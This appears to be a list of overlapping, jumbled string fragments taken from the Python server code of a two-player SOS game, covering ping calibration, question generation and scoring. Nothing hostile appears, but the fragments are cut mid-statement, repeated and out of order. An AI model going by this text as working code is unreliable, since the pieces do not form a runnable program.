"- ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2",
"# Returns the normalized timestamp difference between acknowledgment of two players in seconds.",
"conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game)",
"GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn",
"def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if",
"[-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x",
"\" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid])",
"coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y + 2): for",
"character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid,",
"remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks =",
"time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self,",
"self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]] self.ts_difference",
"self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y, character = move",
"UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = {",
"client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid",
"-1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x -",
"generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit",
"+ question + \" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn",
"range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0]",
"_ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0",
"return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send,",
"- self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] =",
"random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer = str(eval(question)) with",
"self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 =",
"GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]:",
"with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid =",
"True return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid:",
"0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def",
"if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD)",
"-1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in",
"\"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i - 1)",
"if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid)",
"directions: sequence = \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x -",
">= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\"",
"__init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts",
"in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] =",
"Average difference between timestamps of player 0 and 1. self.received_acks_cnt = [0, 0]",
"time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if",
"self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0 * 1000, \"",
"character): directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock:",
"id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) +",
"for _ in range(10)]] self.ts_difference = 0 # Average difference between timestamps of",
"sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0]",
"_ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 # Average",
"self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None: ready = True",
"[None, None] print(\"Generated the Question: \" + question + \" / UUID: \"",
"def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id,",
"= [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question()",
"if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player",
"def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id,",
"question + \" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn =",
"# or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y,",
"ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for",
"2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \",",
"= json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i",
"client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock:",
"id else: self.game.turn = id self.notify_players() # Returns the normalized timestamp difference between",
"acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] -",
"self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question \"",
"self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) /",
"question = str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state",
"difference between acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] -",
"return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid])",
"in range(coordinate_y - 1, coordinate_y + 2): for direction in directions: sequence =",
"daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] !=",
"GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None,",
"str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx,",
"coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with",
"id: # or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x,",
"calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"]",
"import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in",
"{id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close()",
"not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] *",
"self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if",
"* self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]:",
"if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list",
"id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message",
"/ 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds is:",
"self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]:",
"id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state !=",
"self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4())",
"- id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def",
"else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 -",
"[[{} for _ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0",
"conn return id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] =",
"0.010 # in seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4,",
"for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time",
"2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for",
"self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[],",
"in range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y - 1,",
"id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts",
"Game information to the all players\") def connection_thread(self, conn, id): if self.game.state ==",
"self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <=",
"conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message)",
"self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn",
"in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]])",
"0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name):",
"+ uuid) self.both_players_received = True return else: return else: return time.sleep(0.2) with self.lock:",
"add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self):",
"= Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False",
"seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self,",
"= b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections = [None,",
"if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference))",
"seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id]",
"if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the",
"= None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{}",
"str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION",
"self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\":",
"= True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to",
"ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False",
"self.send_id(id) if self.game.players_names[1 - id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps,",
"if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start =",
"self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None,",
"threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations",
"print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit =",
"character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\")",
"uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0",
"if self.game.players_names[1 - id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,),",
"Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks",
"[1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1,",
"i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y - (i",
"self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1",
"idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 -",
"== GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx,",
"+ uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0]",
"= self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) /",
"connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time()",
"<= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question \" +",
"in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0 * 1000,",
"self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec",
"sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) /",
"y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1]",
"sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence +=",
"received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def",
"2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for",
"+ self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self,",
"= self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in",
"/ 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1",
"= question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received",
"self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id,",
"player has received the question \" + uuid) self.both_players_received = True return else:",
"= [[{} for _ in range(10)], [{} for _ in range(10)]] self.ts_difference =",
"-1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x",
"self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1",
"# in seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4)",
"in range(10)]] self.ts_difference = 0 # Average difference between timestamps of player 0",
"self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn:",
"self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid) self.both_players_received = True",
"GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y, character",
"coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration:",
"not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if",
"for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character):",
"self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds",
"return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both",
"information to the all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION:",
"= [[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] =",
"= duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2",
"0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock:",
"self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 =",
"daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator =",
"= character for x in range(coordinate_x - 1, coordinate_x + 2): for y",
"id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self):",
"sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence ==",
"2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated",
"print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid)",
"0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def",
"= ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"])",
"id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self):",
"self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in",
"idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2)",
"in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with self.lock:",
"for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def",
"time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections):",
"message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player",
"id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id]",
"self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts",
"- 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or",
"sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 -",
"Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE",
"self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received =",
"[{} for _ in range(10)]] self.ts_difference = 0 # Average difference between timestamps",
"1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts",
"== \"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question",
"def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0,",
"+ coordinate[1]) def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or",
"\\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence",
"def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)})",
"< 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence =",
"conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1,",
"threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id)",
"= 0 # Average difference between timestamps of player 0 and 1. self.received_acks_cnt",
"1) * direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] <",
"0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >=",
"seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock =",
"self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <=",
"Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn:",
"None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question: \" +",
"self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{} for _ in",
"= time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread,",
"self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"])",
"with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id]",
"in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New",
"= [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator ==",
"delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 delta1 =",
"self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received",
"operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question =",
"self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) /",
"= 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id,",
"def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks",
"- self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time()",
"+= 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference()",
"+= 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def",
"range(10)]] self.ts_difference = 0 # Average difference between timestamps of player 0 and",
"- id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received",
"ping0 * 1000, \" ms\") print(\"Player 1 has a ping: \", ping1 *",
"for _ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt",
"+ self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections): if conn:",
"self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference)",
"!= uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received =",
"direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >=",
"for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c",
"timestamp difference between acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0]",
"self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1])",
"self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations",
"def add_connection(self, conn): id = 1 if self.active_connections[0] == None: id = 0",
"time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION:",
"\"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD)",
"delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts,",
"id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send",
"connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time()",
"return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state =",
"id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board()",
